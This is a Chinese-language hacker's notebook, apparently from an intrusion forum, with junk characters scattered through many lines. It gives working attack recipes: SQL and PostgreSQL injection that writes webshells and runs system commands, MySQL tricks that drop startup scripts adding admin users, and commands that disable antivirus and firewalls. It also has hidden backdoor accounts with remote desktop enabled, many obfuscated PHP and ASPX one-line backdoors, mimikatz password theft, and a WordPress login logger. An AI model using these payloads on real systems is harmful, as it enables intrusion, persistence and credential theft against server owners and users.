第二步:用netstat -ano命令,列出所有端口对应的PID值! ( t4 ]$ G+ D9 q: m3 c) k$ c
   找到PID值所对应的端口
8 p0 F  N  F! i. k
% ~1 m5 ~* G: V5 y查询sql server 2005中的密码hash! j, d4 \/ g( T! e# J. R
SELECT password_hash FROM sys.sql_logins where name='sa'
; ^) T* G9 u% P! N) OSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a+ f! A4 r! V. g5 R- l
access中导出shell
5 j4 g* |8 ]3 ?6 o. K. U6 M' w7 r1 C( j; p4 m+ \
中文版本操作系统中针对mysql添加用户完整代码:
7 Y) w, y9 x. L* e3 b; r" g* ]2 k" g9 @, [1 g# @
use test;
) u% Q7 h  J# Y7 A) N  i1 Rcreate table a (cmd text);7 m. }, i' u4 v
insert into a values ("set wshshell=createobject (""wscript.shell"") " );( W- b; P7 I: `! N- c" t
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );( Z2 I0 O( l$ F6 D/ B
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );3 I& b6 D" `: e3 I
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";  e  g! u4 W  ?$ O& ^
drop table a;. ]$ C# c8 @$ m1 |2 e  [- P+ a
; H3 G; ]( o# s& p3 o/ L
英文版本:
- u. B; ]7 I- a3 x- `# \+ m2 c' u
use test;
0 i' [/ [( g- O% H- K) tcreate table a (cmd text);; J1 Q4 z3 u# S: G* m
insert into a values ("set wshshell=createobject (""wscript.shell"") " );3 E" G3 o( H7 w4 _' p9 e
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );( M2 G. I8 y1 h6 I$ d
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
: A0 A5 b) c2 Yselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
' o. O, ~6 @, D- odrop table a;1 J9 o+ o. @( K7 r) O

/ `5 b9 z4 v9 A0 f6 lcreate table a (cmd BLOB);
+ t" c/ G$ p' r' n2 C5 Cinsert into a values (CONVERT(木马的16进制代码,CHAR));
" A) {! P! K9 Z. W3 o, M/ ^select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
! P* ?1 G0 X5 r0 I* Mdrop table a;
! a2 A; E7 A. f2 B& U) ~3 Z& ^5 D6 b+ A9 k5 r
记录一下怎么处理变态诺顿9 A" u- o& o: \5 T  E" Z
查看诺顿服务的路径- }3 j+ s/ V5 x2 @$ |
sc qc ccSetMgr6 h6 B' ]" A4 e; z6 z8 Y" w
然后设置权限拒绝访问。做绝一点。。
# ?1 Q6 N' v; v+ I& g2 u4 fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
7 z0 C, p5 e, |& \: G$ v  b, Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"8 B, n/ N+ i5 W2 Z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators" k4 x# X9 o, w4 z- V9 x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone: \" U& a7 H4 }: u, I
1 H! ]8 |  G% u% p" q# _/ a
然后再重启服务器3 f3 Y1 {4 [$ |+ ^
iisreset /reboot
9 R5 x( I+ Q0 S0 q& T) o这样就搞定了。。不过完事后。记得恢复权限。。。。  |+ U" w  m) j. M+ V
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
/ r' Z; B  E+ s6 c/ S  z1 Ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F+ N5 ]7 s2 Q, W/ n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
8 `; J# w( [( N! P6 W( o4 Mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
0 G. E" z- p' y. c: ESELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin+ f" V& R& q2 `' _* e
( W; o2 \$ ]6 W1 ~7 J
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')2 ]* u& `* o( h7 f7 ^: |9 c6 r, W

, P. E6 {8 E: \1 q+ _( n, [( U. i2 Qpostgresql注射的一些东西
* U; y9 }3 U: a* Z; N0 m如何获得webshell  m( L6 I: X; i4 H/ A0 \# v/ O* }
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); - n  g5 y) e( D) p% ^( G( U
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); & |" |  I6 p) V6 _4 ^  _4 l
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;: F- H8 S: X) e% Q6 {9 L7 {# r
如何读文件6 \; B$ j2 F1 |/ s5 R8 h
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
8 o& M7 j  o/ V% S& ?# ghttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
2 Q: F- j$ C2 A" ihttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
# `3 m% T: F" s
5 \0 F3 L7 L7 V0 ]# w; o9 pz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
$ M5 D9 ]- B; ]' P5 {当然,这些的postgresql的数据库版本必须大于8.X6 R1 X: a+ ^) C* E
创建一个system的函数:! ~5 T, Q* ], E+ N$ q* C- O
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT. T4 Z$ F# |; s$ ^2 m% H  f5 ?2 T
- P$ S- f5 T' g
创建一个输出表:. P! }3 H! v1 q8 d& g$ G
CREATE TABLE stdout(id serial, system_out text). ~, a. \" P3 Y- P* \

. ]* ?$ a, [! l9 r* g! `3 `- g6 Z6 b执行shell,输出到输出表内:
* M1 X+ J( T9 g- v4 PSELECT system('uname -a > /tmp/test')
, e8 G5 q% z% ]3 K3 G" a& g- ^# H
copy 输出的内容到表里面;" s( U0 z0 c. n/ `" {, O
COPY stdout(system_out) FROM '/tmp/test'
& Z; D# a3 v8 W* k- d; ?/ C1 j2 e5 K8 p, M1 H$ u2 G: I
从输出表内读取执行后的回显,判断是否执行成功, N3 @) M* E, j; y+ O9 U

0 E& T- V7 W. BSELECT system_out FROM stdout
7 O# w6 @7 z: I& v+ ~  t下面是测试例子5 R2 f% S' J2 p, X
5 S% ^, p! Y3 U6 \9 H% T( G6 i
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
- l# }, m" x7 I. n
% \4 {* N; N( ]! @+ W' j2 @/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
4 m2 ]0 [% I( v! [9 C% e! n! d* jSTRICT --
: B" a/ C+ \* _) q
* s, J8 u! s. I  d8 y$ a/store.php?id=1; SELECT system('uname -a > /tmp/test') --
' B% W; ?+ Q5 l4 K3 h! P$ y/ C! s& a2 t7 \% r8 e* a/ A
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --- `# C! a8 r$ P, E
$ g2 s) `( ^' k6 e. ]; o
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--7 ~2 _9 D1 c5 M
net stop sharedaccess    stop the default firewall0 ^4 ?/ x0 |/ R0 C1 D0 z; ?$ e
netsh firewall show      show/config default firewall( T* F& i7 L& |% A7 k# F! a% B
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall3 `, C6 Z6 @9 r6 d
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall2 b- Y* L! b1 b8 Y% A
修改3389端口方法(修改后不易被扫出)
( O. H) x+ s& f6 [8 I# Z- k" Y修改服务器端的端口设置,注册表有2个地方需要修改) n' b3 ^8 s9 }

! r; S+ E: N/ g7 G  Z0 R[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]! Z1 l# |# F5 J2 r
PortNumber值,默认是3389,修改成所希望的端口,比如60005 M, h: ?5 h; u9 z& Z9 V6 u# m
7 S' }) Q6 u3 @" X9 Q
第二个地方:8 D8 r0 ]1 v2 a: B/ {
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] * f% ~) j- g* c
PortNumber值,默认是3389,修改成所希望的端口,比如6000
0 r0 Y4 `, T2 D+ e% {3 t5 s' V* E: h0 }2 W5 g# W/ O# l& h
现在这样就可以了。重启系统就可以了& H: R) [8 ^. B  k9 Y1 e" \8 f
9 V' U0 P0 |, q" Z
查看3389远程登录的脚本+ Z' G* S. k: ^. m+ A
保存为一个bat文件, f- Z7 o/ A% A" X  L8 v6 ]9 B
date /t >>D:\sec\TSlog\ts.log3 H+ i# r& P1 ]
time /t >>D:\sec\TSlog\ts.log
) z3 |3 s+ N4 Q/ v2 `  ^netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
3 A; {  I$ |: q7 U2 [$ S7 estart Explorer& I* ~% G$ A$ F$ A/ d: M- j

9 ~! d' q% B  Z4 o& lmstsc的参数:
: B6 i, f( J$ L* N/ v% K: a% K  F$ H. ^( s! `
远程桌面连接5 Q3 R( d" l- r' Y1 x
& |7 f; v' C# i& U  L$ H" P
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
8 p& p) W" o9 n1 P7 [* p  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?( O% n, r2 l+ e  j& z

! T  g! B5 }" k" n2 L9 r<Connection File> -- 指定连接的 .rdp 文件的名称。0 B, d& X* V2 [  ~: z
$ F7 O# _# e' {0 n
/v:<server[:port]> -- 指定要连接到的终端服务器。
: i' Q* a7 W! L, U
2 a" c; @9 T% {3 e8 `9 X1 S% k/console -- 连接到服务器的控制台会话。
% b$ w0 T3 M+ r& V1 [
1 y  R7 Y/ ?3 h6 u6 X, y: m: z/f -- 以全屏模式启动客户端。
# {* G- J% e, H4 R; x9 Y5 R# \8 e3 b
/w:<width> --  指定远程桌面屏幕的宽度。
5 L2 `' {$ h- p' P0 v$ s( J: V* O! u5 y# H. u) g
/h:<height> -- 指定远程桌面屏幕的高度。
. j) }" V- K* z5 m; X( \+ F3 j( f) [$ ~5 g  a
/edit -- 打开指定的 .rdp 文件来编辑。3 X: A% B( \5 K# `0 S
7 F# g) e. C1 \
/migrate -- 将客户端连接管理器创建的旧版
1 a3 ^6 l8 Q" x* Q# x8 d连接文件迁移到新的 .rdp 连接文件。
  e& G7 c! \' V8 r. t1 g% x
$ t$ R8 o: e) l: q+ [, g3 @+ F: Q5 C, E* c
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就# W& g7 r( n. r: c
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量) O  `# L4 p7 d: j( C" V0 O

3 ?+ A' m% O  I5 ~& ]5 M3 c命令行下开启33897 ]2 J  ^4 p2 \  |) B
net user asp.net aspnet /add& p& K. _2 C6 X$ c8 C; C8 ~
net localgroup Administrators asp.net /add
1 N; u+ g% y3 ?% i# F5 qnet localgroup "Remote Desktop Users" asp.net /add
! t) z# P; c+ Xattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D, m& r5 H9 ^! B0 \
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0, m! D5 P% U7 t5 `
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 13 q5 Z# G# l3 u: ~3 q7 Q( J
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
- ^7 ~4 _) W# W. L; S  u* }sc config rasman start= auto
* u' D/ e  [* C2 A2 a- Qsc config remoteaccess start= auto
5 n4 m" Z! ]: }" W& r# @net start rasman6 Y; Y/ Y7 P# K4 Q! _
net start remoteaccess) e: ]7 I. @0 D9 G3 V
Media% V5 L/ ~, B2 C2 \8 @
<form id="frmUpload" enctype="multipart/form-data"
$ |  ?, H! D* S* `4 Q4 {7 Caction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>; s+ g: q3 j" O
<input type="file" name="NewFile" size="50"><br>
2 o2 Z2 T, b% Q3 U9 Y" D- u<input id="btnUpload" type="submit" value="Upload">$ R; L$ G( v4 I! U% }( S# k
</form>% E% i1 U$ m6 F, ?6 n
. C# @8 M4 G" L% T7 m3 f
control userpasswords2 查看用户的密码
3 G9 x1 ~6 ?% v' Caccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
1 o0 {: S2 Y, U8 rSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
4 u! h1 q" v3 ~) Q& ~3 S# w7 v$ w/ E
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:) {4 c& n# k& s1 A. D% z1 F9 Q
测试1:
! M$ ?( G6 a0 S$ p' lSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1$ {1 A0 F3 ?9 p  Z
% F0 V) e- Z: m* g6 i
测试2:' Y3 t: P' ]  G

8 P+ T2 x" v6 a, A) p! Xcreate table dirs(paths varchar(100),paths1 varchar(100), id int)4 B" M2 T' @, e; r# z. ?* ~
6 J2 Y1 c" s1 t4 ^
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
2 }/ c) \' |& Q9 Y1 B
0 \0 l4 l$ ]; E8 ]. a1 r+ \, lSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1; t. S  z" I+ g. V# `5 t3 ~
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令. Y1 L# C' K$ [0 C* k  ^# T- t+ f( K
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;9 p( M+ g- W+ f5 S4 k
net stop mcafeeframework& M! G9 K) P# V5 Y
net stop mcshield
+ J  T* P" e2 [& Y, jnet stop mcafeeengineservice
9 X+ H% u- G- X5 ]/ k; inet stop mctaskmanager
* T) Y- p$ f% Y$ V0 V# ~http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D; ?3 i2 U! ]5 d% S

5 [* C8 Y8 x' @9 W8 X, E  VNCDump.zip (4.76 KB, 下载次数: 1)
5 I$ g1 M' ]2 i4 n. L5 S密码在线破解http://tools88.com/safe/vnc.php
0 E: V9 j+ X5 s+ Q1 q, o" h9 FVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取4 Z! }+ E* ^7 e
% \6 `/ t+ h5 o5 q9 G
exec master..xp_cmdshell 'net user'
( i$ I8 D  x  zmssql执行命令。" ]' U5 H8 K. s5 ]0 `
获取mssql的密码hash查询
) k4 U! ~& c$ @- W/ ]select name,password from master.dbo.sysxlogins
1 P% s5 v; q7 Z3 G1 Z% M# K3 j1 l
  S6 E* t/ @& H( Z  Fbackup log dbName with NO_LOG;
8 G) y! `+ k6 R# obackup log dbName with TRUNCATE_ONLY;
0 {) d  y2 T; c7 QDBCC SHRINKDATABASE(dbName);
$ y+ q# X$ F7 k' p7 b0 R% H+ K+ J- lmssql数据库压缩
! d& Q% u5 C! `5 s* k- _$ ]
/ y& T' s9 d, Q  A" QRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK1 l9 y5 r  \) e+ j( I) f3 g
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
9 q6 I- z: H5 T
( a  ^+ t7 [5 f+ _, [" p- g0 ybackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'% o7 \7 h1 `7 k( e$ z
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
5 O( ]. U7 z0 @" d) S- n  o* G, E' U
Discuz!nt35渗透要点:
) l; g6 S$ L/ J3 _, }(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default4 {, g% E! S# v3 s1 q% |* g* A
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>3 K. w2 Q- I5 K$ W5 `3 n* F
(3)保存。
* p% j/ E) R8 h' F0 m(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
7 B  h, E. l- n3 k6 I- ]( I- rd:\rar.exe a -r d:\1.rar d:\website\
) j' u( g0 w% X# t0 i递归压缩website
1 s7 |6 \1 {' j1 @; D1 S  m注意rar.exe的路径$ N) W! A4 i! s+ l6 _: v

9 t( ~% D3 M* U& Z1 n<?php
6 w0 N5 A; J% w) }+ e/ J$ F* ]0 H% w
$telok   = "0${@eval($_POST[xxoo])}";6 Y7 s$ n7 }0 E) U: y# u1 k5 f
6 k6 h, Q! y, F' M
$username   = "123456";* t' k2 p- |9 v6 g2 a
0 {6 t  |$ u% M% \* K
$userpwd   = "123456";8 f6 p! D, n1 v) E! e! a2 I
: S" w6 h% {7 s* W' D, w
$telhao   = "123456";2 [3 A  ~: y" b3 V$ ?

( }9 G9 C- U. P' A5 ^3 y+ @$telinfo   = "123456";
+ R6 B7 j" J4 q# m. j( N
9 _: _( L" ^- y# e# \1 s1 ^3 l/ `2 D?>
. R9 r6 k4 y- {  E( g  Gphp一句话未过滤插入一句话木马
1 V( l) r5 \6 x! u3 e" T: H
: z8 H% _; ]$ n1 ^' }- k站库分离脱裤技巧) X, t' d  n* N. j( D
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
- z  s6 n. q% X: J4 C$ hexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
' j7 \+ \& P1 x条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。( O+ N5 S! e& N4 i- u) O& m& q* D
这儿利用的是马儿的专家模式(自己写代码)。- z" t/ |9 ?9 x9 B* x8 V3 d& q4 g
ini_set('display_errors', 1);
( }, j( S1 L5 g+ h' j1 mset_time_limit(0);+ b  V" |+ m9 t9 K9 ~7 X
error_reporting(E_ALL);
4 W. e+ w8 X# D5 j' R7 B$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());1 F$ b% j, R% ]9 u" |9 y8 A& ^
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
  s) z8 x, r1 v. ~& K* K0 p$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
; ~8 {7 }% a- v1 x( }( x) j$i = 0;6 [2 C0 f" C; ~! F
$tmp = '';
7 h$ y6 b5 e* X8 o0 C' @% l; Ywhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {! Z/ Z. j7 c$ P% L' z# V
    $i = $i+1;
* C( C1 Y: A0 \- Z. O. _    $tmp .=  implode("::", $row)."\n";; _! G/ G% a4 G
    if(!($i%500)){//500条写入一个文件2 Q3 ?0 B2 Q/ z# x. _( T  ?
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';5 q+ K7 [; g) G% V9 W3 l6 |* q; q
        file_put_contents($filename,$tmp);
& ^8 E' J% k& V0 ~! r        $tmp = '';
& V* `6 K* _, Z    }2 ~6 f' {9 [; ?( |. |4 `
}# d7 k5 i6 A' T) v5 l
mysql_free_result($result);
: y# u5 r5 [; [' x) L/ {. u7 \' V3 g% c# Y' c  t

! b3 x' ?/ y' @/ B6 ^) [
- |. G& j$ V' D3 l//down完后delete
1 B- @  g/ m- ~9 n6 q
& m. @( \/ Z0 h2 n& u- N( C+ Y' m7 w9 y/ S) h* d$ r
ini_set('display_errors', 1);5 T! E5 B* Y) w
error_reporting(E_ALL);7 U+ n( n: r! [3 O# _- X8 |
$i = 0;$ _. b" I6 U- S1 q1 X
while($i<32) {
0 D) n* v8 R; t( h2 e( N    $i = $i+1;
, \  F) Z) \3 W! \1 z+ e        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';! F, m! h/ U8 i/ I
        unlink($filename);. N! Q: g; Z: G$ i2 G: ]
}
" Z( `9 _3 W1 [, n4 o0 b" Lhttprint 收集操作系统指纹) U/ a' `; B# j1 A- W# r+ I
扫描192.168.1.100的所有端口- J8 ~" q6 @6 B. w+ o; G
nmap –PN –sT –sV –p0-65535 192.168.1.100
9 P6 O( \' Y2 S3 Thost -t ns www.owasp.org 识别的名称服务器,获取dns信息8 N4 H7 A* n8 R
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
) j! i1 ~: }7 z4 {, _* f: RNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
( \' D  C$ r' z" Y4 Y  M! R1 q5 Y" E
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)' r; K2 h/ P! z9 ]

( F- C* `) K1 ?5 C  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)$ Z  I3 L  t. \" P) N+ ^

3 r' Z- O! @9 |2 Z) S( Y' z7 P6 K% v  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x- l- g# k1 ^: W
0 f3 K: x* R1 ~5 N: h0 L1 f& F
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用). g) Q8 ?" x. Q2 h- y
3 p& V4 q" S5 {, ?( _# j- |: A$ Q3 Z
  http://net-square.com/msnpawn/index.shtml (要求安装)
3 c3 e5 x" W7 Z$ @
- t  {& m4 c" d/ R  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
9 @" i+ P6 i) b! c$ y. R1 [( j% w2 m* p
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
- Z+ J0 S' L2 y, Z1 u0 ^set names gb2312
# p* K7 i; J4 R/ c8 N: a  Q导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
+ o( e" P1 @9 C+ B( J2 o4 d. p! m! n) N: h8 }  O8 |6 G4 Y. [
mysql 密码修改9 E9 J1 K7 |9 m8 l1 Y$ w2 U
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
0 Y9 c5 ]* W0 F3 u/ J  _& |0 B9 m9 q) Eupdate user set password=PASSWORD('antian365.com') where user='root';: q; F/ a4 @9 ]/ Z. h" H
flush privileges;, f5 {% m- R, D9 |9 g! _
高级的PHP一句话木马后门( L% B' m* G! T7 t( L1 R- r

+ C) \. C; d2 t# w入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀8 ~  y+ V# C2 E
1 G6 X+ B7 O- y( n
1、0 J' A6 D) r. J0 y% p: `

+ C' y- K: j# |$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
6 o$ p, |. f/ H+ u) H+ h  R8 R: N7 f
$hh("/[discuz]/e",$_POST['h'],"Access");6 B' s- v5 @+ e  Z  R

' c0 y- M' I. c/ B0 j5 u7 l//菜刀一句话8 X- f6 Z, h) @. d+ Z

3 o" z+ M3 e9 u0 P5 F, Y3 l$ \2、
, T. I9 D0 Q: ~- _
6 e$ @* X( L$ g- u/ w$filename=$_GET['xbid'];
9 j. ~% @! ]- {
0 X. ]- z; u) F8 I6 [include ($filename);8 U6 k+ N& c6 w, K

" v+ M4 t4 ~& w( ^/ z! r//危险的include函数,直接编译任何文件为php格式运行* G, i4 `/ L! Y; P2 V

3 q' h- U! E& e! q. f- ]3、
6 X" R# a# P  I" b! m1 j
; j1 F6 W" q8 s9 u2 G: U! x: P$reg="c"."o"."p"."y";
$ R$ v6 F* G- |2 J+ f9 K* \: ^
# V7 d8 o: F* v% ~# ]$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);( D2 E9 e# t! ]* d
+ R/ C" [' p( ^' P2 K+ h& F
//重命名任何文件
. t# Y3 n" o0 H- [5 S2 P* Z/ N; [1 S+ [$ n6 W
4、
- y- ]* f7 {& b+ s7 g% e2 H, U' S
; u) A. N7 y6 M6 ]% o7 ^/ q9 [$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";) F6 \) o7 k2 N1 _% J

7 h1 ]& A. U; O7 `$gzid("/[discuz]/e",$_POST['h'],"Access");. N. I/ ^; T1 ]; M2 r; l
3 j, @* i$ i* A! r7 J* ]- e
//菜刀一句话
$ V+ O* {/ V0 N, ~
6 l; z- [5 a8 n2 [  h- s6 w4 B5、include ($uid);
% v% `: k+ l( c+ a( V  w9 `
6 z* \8 G+ l) L//危险的include函数,直接编译任何文件为php格式运行,POST
7 K! I8 q$ X0 d- |# V9 Y  [5 O% Z9 Z5 B' @
! o6 f+ ^) Z( y. E$ G
//gif插一句话+ r& E; G$ B. t: n: w! R
/ o( z4 y. p5 V: e' ~0 K2 p
6、典型一句话# |- g7 y& `, Y3 n  v+ ]0 J

0 y9 w( q1 K, c- q* s0 T/ V程序后门代码
; |4 E: ?* z3 a( [<?php eval_r($_POST[sb])?>0 t5 D4 d; Q% a3 Y
程序代码
% s. k1 j$ O+ m; j" M( s<?php @eval_r($_POST[sb])?>8 ]: M! ^1 G! {, ]' r+ J
//容错代码' \0 l1 ^2 Z3 ~* ~
程序代码( G' f& D! @% C% {- V+ ?' ?
<?php assert($_POST[sb]);?>4 D! ^9 d# \! A
//使用lanker一句话客户端的专家模式执行相关的php语句
" U! B7 \' M9 V- N程序代码
4 ~& t3 N8 ]8 N<?$_POST['sa']($_POST['sb']);?>2 n. q% L; s* S4 A
程序代码* B% \: Q1 r8 H+ A" M
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>' H: X$ N# a& }2 C
程序代码$ Q* X& Y- U9 `) g7 {2 \
<?php5 c* a# P- X8 K& I# g+ Q+ F2 Y
@preg_replace("/[email]/e",$_POST['h'],"error");
% m9 V: x+ v4 T9 g, W- c0 l0 @$ s9 k?>9 @0 `" S' ~% n" W+ \
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入9 B5 x7 T/ _* v- Q- B8 H6 @
程序代码
+ n$ ?. M4 r9 y9 b# D% s7 v<O>h=@eval_r($_POST[c]);</O>
6 e6 S3 s% c+ C& q6 V程序代码
7 q: \: m! }! b6 {7 k; p( I. b<script language="php">@eval_r($_POST[sb])</script>" `2 g# K' |3 v+ }3 {
//绕过<?限制的一句话3 i% y& t7 ?% B+ i

8 H4 d* L7 Q% R, `4 o5 f7 C" f/ Ohttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
# d6 f+ u) @# V详细用法:
$ R& x0 O  j/ j" P( O1、到tools目录。psexec \\127.0.0.1 cmd
  N) W/ U" w9 u# E0 b. A2、执行mimikatz
, Y% e- K  j2 R# T9 `3、执行 privilege::debug0 f: E  D; T2 c9 z' t8 k* D$ W
4、执行 inject::process lsass.exe sekurlsa.dll
' R; X! U! p7 [, r5、执行@getLogonPasswords
, ]8 W0 B! }+ i; q- ]7 a6、widget就是密码
. m1 w7 x% o( E! S; R+ G" K, o- W. t7、exit退出,不要直接关闭否则系统会崩溃。2 s* ~8 Q7 }6 L
# F5 w9 G; p: v/ S" {# M% A* }
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
; D3 t0 [! w# u# ~* b/ ?  g6 B+ V' U: H5 F1 D. b% I0 B
自动查找系统高危补丁
/ Y( z: j1 r5 L" ssysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt- z9 |" t  V, [) J, ~8 s
+ e& x+ Z' M) s  u" I: a
突破安全狗的一句话aspx后门& P" y/ Z. J6 |8 X0 V% N/ c" e
<%@ Page Language="C#" ValidateRequest="false" %>
1 k9 ?! j: S- Y' y( O& W, U<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
9 W$ q; T; i, K. S( q5 a: Swebshell下记录WordPress登陆密码: g5 R2 _  l8 f+ p6 b" o* ?5 F
webshell下记录Wordpress登陆密码方便进一步社工4 s1 H, b- j* Q' ?% {5 s1 P9 y
在文件wp-login.php中539行处添加:( K- ?8 \  a5 r( I
// log password
. u5 |  M* w& h# \) r+ {$log_user=$_POST['log'];: W* p; }, F/ @; _: D% k$ O2 X& ?) C
$log_pwd=$_POST['pwd'];
' M, P9 r' X7 W, ]7 u7 s$log_ip=$_SERVER["REMOTE_ADDR"];
